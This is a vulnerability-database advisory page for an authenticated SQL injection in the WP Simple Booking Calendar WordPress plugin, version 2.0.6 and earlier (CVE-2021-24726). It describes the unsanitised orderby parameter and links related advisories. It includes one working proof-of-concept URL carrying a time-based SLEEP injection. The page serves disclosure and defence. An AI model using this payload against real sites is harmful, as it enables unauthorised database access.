Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:F85B6033-D7C1-45B7-B3B0-8967F7373BB8
HistoryAug 06, 2021 - 12:00 a.m.

WP Simple Booking Calendar <= 2.0.6 (before 07/12/2021) - Authenticated SQL Injection

2021-08-0600:00:00
wpvulndb
100
wordpress
simple booking calendar
version 2.0.6
authenticated
sql injection
security vulnerability
exploit

EPSS

0.001

Percentile

44.5%

JSON

The plugin did not escape, validate or sanitise the orderby parameter in its Search Calendars action, before using it in a SQL statement, leading to an authenticated SQL injection issue Note (WPScanTeam): The issue was fixed without bumping the version, so there are two 2.0.6 versions out there, one vulnerable, the other with the fix.

https://example.com/wp-admin/admin.php?page=wpsbc-calendars&paged=1&s=MyCal&orderby=name,%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%286%29%29%29a%29&paged=1

Related

prion 1
patchstack 1
cvelist 1
cve 1
wpvulndb 1
nvd 1
prion
prion
Sql injection
2021-09-13 18:15:00
patchstack
patchstack
WordPress WP Simple Booking Calendar plugin <= 2.0.6 - Authenticated SQL Injection (SQLi) vulnerability
2021-09-10 00:00:00
cvelist
cvelist
CVE-2021-24726 WP Simple Booking Calendar <= 2.0.6 (before 07/12/2021) - Authenticated SQL Injection
2021-09-13 17:56:41
cve
cve
CVE-2021-24726
2021-09-13 18:15:18
wpvulndb
wpvulndb
WP Simple Booking Calendar <= 2.0.6 (before 07/12/2021) - Authenticated SQL Injection
2021-08-06 00:00:00
nvd
nvd
CVE-2021-24726
2021-09-13 18:15:18

EPSS

0.001

Percentile

44.5%

JSON
Related for WPEX-ID:F85B6033-D7C1-45B7-B3B0-8967F7373BB8
prion1patchstack1cvelist1cve1wpvulndb1nvd1